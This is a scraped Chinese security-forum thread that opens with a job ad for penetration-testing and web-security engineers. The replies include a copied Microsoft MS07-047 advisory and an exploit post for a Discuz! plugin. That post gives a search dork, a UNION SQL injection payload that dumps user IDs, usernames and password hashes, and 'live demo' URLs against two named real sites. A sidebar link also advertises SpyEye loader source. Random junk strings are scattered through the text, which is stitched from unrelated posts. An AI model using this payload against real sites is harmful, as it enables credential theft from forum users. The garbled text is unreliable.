返回列表 发帖

[人才招聘] [招聘] [HR]红科网安 网络安全工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 红科网安北京科技有限公司
  • 工作地点: 北京
  • 专业要求: 计算机专业 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 4000~6000
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.honkwin.com
  • 简历邮箱: hr@honkwin.com
  • 联系电话: (010)62717538-602 郭小姐
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++红科网安北京科技有限公司相关说明++++++++++

    本帖最后由 jeffzua 于 2010-11-7 23:02 编辑
    % Y9 j" k' d* d/ ?
    - N1 t7 R! k$ c# }% r3 h岗位职责: ' S9 }) @) O9 I. ]' S
    1、信息安全渗透测试、风险评估与加固工作的组织实施; 3 d" ^8 Q$ q/ N& {7 a% S$ u
    2、构建WEB内容安全体系,评估线上业务安全问题,指导安全测试,跟踪解决内容安全问题;
    & d3 ]3 N: X# I0 L3、构建攻击防御系统,保障平台线上服务安全;
    % x. i# k: u6 T( Q: J* ]- G4、构建内网安全模型,保障内网稳定和信息安全; ; s; B4 A# T9 l: e( i& T2 u
    5、构建攻击测试模型,评测安全设备的安全性能;
    ) A/ h& m1 e0 x6 h6、制定安全标准和流程,规范操作行为; : I- ]% a9 u6 m+ p% i
    7、提供网络安全攻防技术及相关工具的培训;
    # Y6 J. H  J; N3 m岗位要求: ' i7 m# g0 R5 v  U
    1、掌握信息安全基础理论知识,熟悉国内外信息安全政策与标准,包括等级保护、风险评估等;
    - B6 n+ s$ b3 z# g& F2、熟悉网络及应用系统的常见安全漏洞与隐患,能够利用已有工具进行识别和评估; 7 S0 w' v/ c" a
    3、针对各类主流系统(包括网络设备、操作系统、数据库及应用系统)的渗透方法,熟悉黑客常用的攻击技术、手法和相应防范措施,精通WEB安全攻击和防范方法,具有大量的安全紧急事件响应经验,具有多个渗透测试项目经验;
    ( E1 j( b& u9 x( T6 L* `2 [4、能搭建各类渗透测试的演示环境; 能够熟练运用各种手段对系统实施有效的渗透;
    2 X8 P2 W' @, a1 G8 S( ]& P5、掌握主流的安全技术,如网络安全、主机安全、应用安全、密码技术等; ' L4 A, G/ o+ E% f' Y) r0 Q3 a. i
    6、熟悉主流操作系统、数据库、网络与应用系统的工作原理,全面掌握常见的安全漏洞及利用技术; ! i7 L; }5 \6 p" ~3 M+ d
    7、熟悉常用web应用,如: IIS、Apache 、 weblogic 、tomcat 等,能比较熟练的配置使用这些平台系统并进行优化和漏洞修补;) p( y9 S/ D1 t- P5 T5 v  L
    优先考虑的条件: $ B1 f- \( x1 ^  m- ]
    1、熟悉防火墙、IDS等安全设备; 熟悉shell、perl、php、jsp、asp.net中至少一种脚本语言 6 R5 W! }8 j; i' n! v
    2、具备较好的文档写作能力,能够独立完成渗透测试方案、测试报告及攻防技术培训讲义的撰写; ) l: M9 Q' z" k2 D& [) [* f, v
    3、强烈的责任心和良好的团队合作精神,较好的沟通能力; ! \( K1 ~! l& |, o& o
    4、有全面的安全知识体系,对安全问题十分敏感,能够制定方案并推动其实施;
    $ V) w. n) n6 P# r  d5、具有良好的团队合作精神和主动学习精神; % h8 x( w, q/ e: F  r
    6、有cissp、cisp证书者优先。
    9 p5 e3 \0 @+ j/ r: b) t2 @  y: H# A) w) \
    6 [: L; u- N) {% B; n7 U

    5 ]3 T" b5 H8 f+ }另外还招 《web安全工程师》 要求如下:# Z. a- M( F% }( N! K7 u0 g
    , x" y1 U7 r# e! [) o* g+ j
    学历:大专    工作年限: 1年以上。。
      _$ g& w9 c' A1 G  V8 |8 {) L6 Y( Y7 k0 k2 A
    1、Web漏洞检测技术的研究" r  [3 A+ F4 E, Y) e. ?" f' Y7 L  n
    2、网页木马检测技术的研究
    + ^) P+ v$ L- P% L3、负责Web安全评估及加固工作- e! I* C5 {2 M; Q% f
    4、使用脚本编写程序# q1 k; ?% B; e) n, W
    5、对公司产品进行安全测试
    , X8 y% x  M) ~& h. n5 H: d- W任职要求:1 [; H4 e" E9 ?: i& s+ U
    1、具有一年以上Web安全方面的工作经验
    6 [+ i! Y' n& E+ b& x2、熟悉Web相关程序的工作原理,以及Web2.0等相关技术/ m; D9 b/ j5 X! u
    3、对Web攻击(Sql注入、XSS、挂马等)有深入的研究和认识, 熟悉Web渗透和防御的基本技能, 熟悉常见的Web漏洞、Web木马、Web挂马技术和Web渗透技术;
    & L2 _& ?' ]1 A3、具备较强的编程能力(C/C++,网页编程和脚本编程),优先考虑;
    & r* o0 ~# }' L& H" P3 `( }4、对攻防策略的研究具备浓厚的兴趣;
    ; X+ p, m$ \6 _6 I4 k5、有团队合作意识,具有较强的沟通及团队协作能力,勤奋踏实,吃苦耐力。

     

    您可能还想看的主题:

    《瑞星网络安全高级工程师培训》课程表

    我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

    安全宝招聘安全服务工程师

    SpyEye 1.3.45 Loader源代码下载

    知道创宇长期招聘Web安全研究员/Python Web研发工程师

    北京某安全公司招聘WEB安全工程师

    新浪招聘安全工程师、安全开发工程师

    谷歌雅虎等宣布6月24日为全球IPv6测试日

    IP地址即将用光

    我国网络安全的若干新思考

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:jeffzua发表,本帖发表者jeffzua符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者jeffzua和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    MS07-047:Windows Media Player 中存在安全漏洞
    发布日期: 八月 14, 2007版本: 1.0
      Q* f; a- |/ H+ h
    摘要:
    4 K, M/ C) q8 Q( J# Q- C
    此重要安全更新可解决两个秘密报告的漏洞。 如果用户在 Windows Media Player 中查看了特制文件,这些漏洞可能允许执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
    4 C/ N  K' Z8 B4 E! u
    这是针对受支持版本 Windows Media Player 7.1、9、10 的重要安全更新。

    & [0 h. }2 t/ L) F
    建议。 Microsoft 建议用户应用此更新。
    ' i  _5 S) |3 }5 H7 F, A8 N. t
    受影响的软件操作系统 组件 最大安全影响 综合严重程度等级 此更新替代的公告  Windows 2000 Service Pack 4 Windows Media Player 7.1 远程执行代码 重要 MS06-024 Windows 2000 Service Pack 4 Windows Media Player 9 远程执行代码 重要 MS06-024 Windows XP Service Pack 2 Windows Media Player 9 远程执行代码 重要 MS06-024 Windows XP Service Pack 2 Windows Media Player 10 远程执行代码 重要 MS06-024 Windows XP Professional X64 Edition Windows Media Player 10 远程执行代码 重要 MS06-024 Windows XP Professional X64 Edition Service Pack 2 Windows Media Player 10 远程执行代码 重要 无 Windows Server 2003 Service Pack 1 Windows Media Player 10 远程执行代码 重要 MS06-024 Windows Server 2003 Service Pack 2 Windows Media Player 10 远程执行代码 重要 无 Windows Server 2003 x64 Edition Windows Media Player 10 远程执行代码 重要 MS06-024 Windows Server 2003 x64 Edition Service Pack 2 Windows Media Player 10 远程执行代码 重要 无 Windows XP Service Pack 2 Windows Media Player 11 远程执行代码 重要 MS06-024 Windows XP Professional X64 Edition Windows Media Player 11 远程执行代码 重要 MS06-024 Windows XP Professional X64 Edition Service Pack 2 Windows Media Player 11 远程执行代码 重要 无 Windows Vista Windows Media Player 11 远程执行代码 重要 无 Windows Vista x64 Edition Windows Media Player 11 远程执行代码 重要 无

    2 G. i5 h$ K- ^: ^9 b1 s
    微软的安全公告:
    1 r# V# _7 I) `# I% ^) Q& @" J( P6 `
    http://www.microsoft.com/china/technet/security/bulletin/MS07-047.mspx
    " L- ]. \/ _. B9 x, [( g, H; z6 d* w
    (以上链接均连到第三方网站)
    1 z% v& F0 r6 n; y
    # V; V+ w) }+ H8 h+ b2 m
    ! [( z: W# ]3 X; x# p, v
    ( X# o/ ?& a% U) Y' T
    0 n: Q! K0 R1 f& M% x, T( L
    5 X" ]9 a! B$ d8 s, g$ ^

    " c8 l7 F: A+ ?
    $ X, ^& A' i' v/ v8 n6 f7 M; L0 n6 I! L6 ^5 b

    1 w% X7 z- c. j  h) s: O5 U7 {" e' n& n" W* ]
    + Y6 @, l% }: y9 t+ y, A# Q
    ' Y2 A5 G  n1 K& _; o% l& e9 U

    3 B9 k1 h7 O  H6 {: t4 |% r
    * S8 X- z8 N9 n0 A! p3 R: u+ q( c* T, m/ |
    ! Z4 X) d* H* O7 @+ [: ^: @  S1 W
    2 w4 Z5 E3 V" b% y; j  h
    - R  q1 E: x/ _9 k; v
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    哈哈 支持啊 可以换头像咯哦,不过现在也蛮不错的。 6 D! I$ p' W4 T  A
    , g* b1 [6 B+ d  |3 g

    , f+ l# O5 G0 V7 f0 \5 N
    % V% E2 g( ]1 ]! U2 \+ Y3 W4 _# u. B, ]9 R( w4 }
    4 L( y2 @& s% C- c5 d
    5 U- S# x) m+ Y

    ! Q2 V7 B6 u2 s% f% ~  V! ]4 A  K4 y& g+ e, M+ P& V! c
    0 v  r. \) m& C3 {7 i' S7 T
    ' k7 o8 `- _0 i2 T* K: }
    8 \( J- ?, T$ }' _
    ! r" ?* A! e+ W

    ' @4 h5 a) s: K1 r9 S$ e/ G; h; _* g" w/ ]( A: G# \% O
    & E3 Z. v- \4 }; B% a  _

    , f6 G+ e- E$ E4 V- Z5 a3 s7 L8 H1 j+ M

    8 o/ U0 h* x/ v* O! o公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Discuz!论坛江湖插件漏洞
    [+] Founded         : ZhaoHuAn                                     [+] Contact        : ZhengXing[at]shandagames[dot]com                           [+] Date        : Feb, 9th 2009         [+] Update        : Sep, 1th 2009                                                                          ========================[Soft Info]======================                                                                                  Software: Discuz! Plugin JiangHu Inn                         Version        : 1.1                                                         Vendor        :http://www.discuz.com d0rk    : inurl:forummission.php                                              [-] Exploit: [+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [-] SqlI PoC: [+]http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [+] Demo Live: [-]http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [-]http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- " |# Z7 h- [* Z% l2 ^, q7 [
    # _9 ^. O/ o% P2 |' i
    6 J6 H' r" c, F/ ]  M9 w2 g" N
    5 B& h6 s3 a  e' R/ k1 u! P. x6 C

    ' O1 h/ g: R" a) D& {7 d) j: b
    / V* p! w8 D; H$ a  o. D) Q
    % v- _* G; S" m, H
    1 g8 E! [4 s. S2 Z4 T
    ; M8 O) F$ G! o2 e
    # ]5 p+ X1 T( Q1 e+ }
    5 }1 W# Y$ L0 T
    ) y2 P/ ~+ `3 R2 I3 {. {
    4 H% J, d- H3 L; `- i, Y# s4 b: W+ C, q  O+ @

    6 `! n9 f' W5 G: G
    ; D6 U1 Y* o5 P- v' Q( D9 C. m$ o, n8 A0 D  K0 J# `
    3 H+ a" g3 [6 `
    1 V+ @  f2 V$ S1 j: w- d6 u4 t
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表